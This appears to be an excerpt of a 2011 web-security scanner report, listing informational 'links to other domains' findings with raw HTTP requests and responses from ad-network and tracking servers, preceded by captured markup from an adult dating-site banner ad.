<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0RGhQd3l2NDRYQU1EaEdBREo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">tallme1</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0RGhQd3l2NDRYQU1EaEdBREo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3REFpNFJ3T0VZQUxfT0Z3REo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/SL/scSLSPJzTpSPOJBXD7W7N76ZQ.jpg" width="120" height="160" alt="No Photo" title="notinterested38" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3REFpNFJ3T0VZQUxfT0Z3REo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">notinterested38</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3REFpNFJ3T0VZQUxfT0Z3REo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2QUowUU55ZUVZQU1EaEdBQy9qaGNBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/NF/xJnfLZteDEoqDfdu4YdSPGg.jpg" width="120" height="160" alt="No Photo" title="whiteass43" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2QUowUU55ZUVZQU1EaEdBQy9qaGNBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">whiteass43</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2QUowUU55ZUVZQU1EaEdBQy9qaGNBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0dHV1WUpINjBCQU1uaEdBREE0UmdBdjQ0WEFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://piclist.pop6.com/ffadult/featured/external/photos/LP/10lPPowh8y1MYTxLlSq6KA.jpg" width="120" height="160" alt="No Photo" title="kinky0311" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0dHV1WUpINjBCQU1uaEdBREE0UmdBdjQ0WEFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">kinky0311</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0dHV1WUpINjBCQU1uaEdBREE0UmdBdjQ0WEFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2R0VDTXZ5T01WQUJfdEFRREo0UmdBd09FWUFMX09Gd0NPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/HR/MFhRPXokdJ7F3EoXkxDCCg.jpg" width="120" height="160" alt="No Photo" title="mixedcarmel28" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2R0VDTXZ5T01WQUJfdEFRREo0UmdBd09FWUFMX09Gd0NPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">mixedcarmel28</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2R0VDTXZ5T01WQUJfdEFRREo0UmdBd09FWUFMX09Gd0NPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2RnF4OFdqdmtZQU1qakZRQWZyUUVBeWVFWUFNRGhHQUMvamhjQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/Q2/nLq2I1zL50Hl9HZiYTNSLYg.jpg" width="120" height="160" alt="No Photo" title="sexybeachchick5" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2RnF4OFdqdmtZQU1qakZRQWZyUUVBeWVFWUFNRGhHQUMvamhjQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">sexybeachchick5</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U2RnF4OFdqdmtZQU1qakZRQWZyUUVBeWVFWUFNRGhHQUMvamhjQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="120" height="160" id="lickemup1967" align="middle">
<param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="movie" value="http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_lorellay4u_120x160.swf" />
<embed src="http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_lorellay4u_120x160.swf" flashvars="target=_blank&go_url=http%3A%2F%2Fmedleyads.com%2Fspot%2Fc%2F1313434555%2F1247371422%2F13190.html%3FMD%3DaHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3a2FKb3lnU3NYQUk3NUdBREk0eFVBSDYwQkFNbmhHQURBNFJnQXY0NFhBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ%3D%3D%26creative%3Dpiclist_horizontal" bgcolor="#ffffff" wmode="opaque" quality="high" allowScriptAccess="always" width="120" height="160" name="lickemup1967" align="middle" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
...[SNIP]...
<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3a2FKb3lnU3NYQUk3NUdBREk0eFVBSDYwQkFNbmhHQURBNFJnQXY0NFhBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==%26creative%3Dpiclist_horizontal" target="_blank">lickemup1967</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U3a2FKb3lnU3NYQUk3NUdBREk0eFVBSDYwQkFNbmhHQURBNFJnQXY0NFhBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==%26creative%3Dpiclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div id="logo">
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" title="bookofsex.com" target="_blank"><img src="http://graphics.pop6.com/banners/bookofsex.com/26400_logo.png" border="0" width="218" height="35" alt="" /></a>
</div>

<div id="text">
<a id="text" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" target="_blank" title="Click here for more.">the adult social network</a>
...[SNIP]...
<div id="btn">
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" title="Click here for more." target="_blank"><img src="http://graphics.pop6.com/banners/bookofsex.com/26400_joinbtn.png" border="0" width="105" height="32" alt="" /></a>
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=2300&site=ffadult&session=G%3C%3A%3C%5D%40DQN%5B%3EL+1313434558+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1934513.submad_24810_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

13.13. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99065600 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC; VWCUKP300=L123100/Q75332_14414_702_081511_1_082811_458356x458317x081511x1x1

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 15 Aug 2011 18:26:36 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

13.14. http://bpx.a9.com/ads/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /ads/getad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads/getad?p=81&ltids=1091&r=765314 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html?p=81;last=1091;r=663867
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bJcShNvdj16F6DYDYjovIPhCLX94XksgEN48Xf7M3x50soO8DoxsKBap60SqfzCdq5NpNBRJQwi3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats="H9E6lfkkcKINL0lkLDa7bO7+TyGijwyrWYW4utrrJV+MW1h08pte1aa/EjUaO29Xe9wmkmzg/O8YebDXt8+IYDxjvPnT03AZIVtAWEIwMGuhbroYRSWW4A=="; Version=1; Max-Age=86400; Expires=Tue, 16-Aug-2011 18:26:35 GMT; Path=/
Content-Type: text/javascript
Content-Length: 274
Date: Mon, 15 Aug 2011 18:26:34 GMT

a9_render_ad({"s":"300x250","tr":false,"nid":22,"p":81,"n":"Specific Media","html":"<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 src='http://afe.specificclick.net?l=1142910522&sz=300x250&wr=h&t=h'><\/IFRAME>
...[SNIP]...

13.15. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=2.4759&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=9438D1EC-137A-41B9-A85A-FC3DB1591307&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbpx.a9.com%2Famzn%2Fiframe.html&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313426573+ \"d7090a0b-960a-46fe-90f5-5e451fe1ab2c\"+ 70238+ 29835+ 1209]}"; camp_freq_p1="eJzjkuF4PYFNgFFi18yln1gUGDV23V//icWA0QLM55LhOLOOBSi7Hir7GkQDZddDZS/dZQbK9kJlT0JlwXwuEY5Vx0EmL940ESjLoMFgwGDBABTtegUS3fb7z0dk0e5mdgEmiS5kUQAIgzND"; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; io_freq_p1="eJzjEuaYFC/AKLFr5tJPLAaMFmCaS5xjj4sAk8R6EEeBQYPBgMmiFywhzDE1WYBZYvGmiVAJBgsGoODkNKAR237/+QgXBAC33hmb"; dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"4\": 1313426573}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Type: text/html
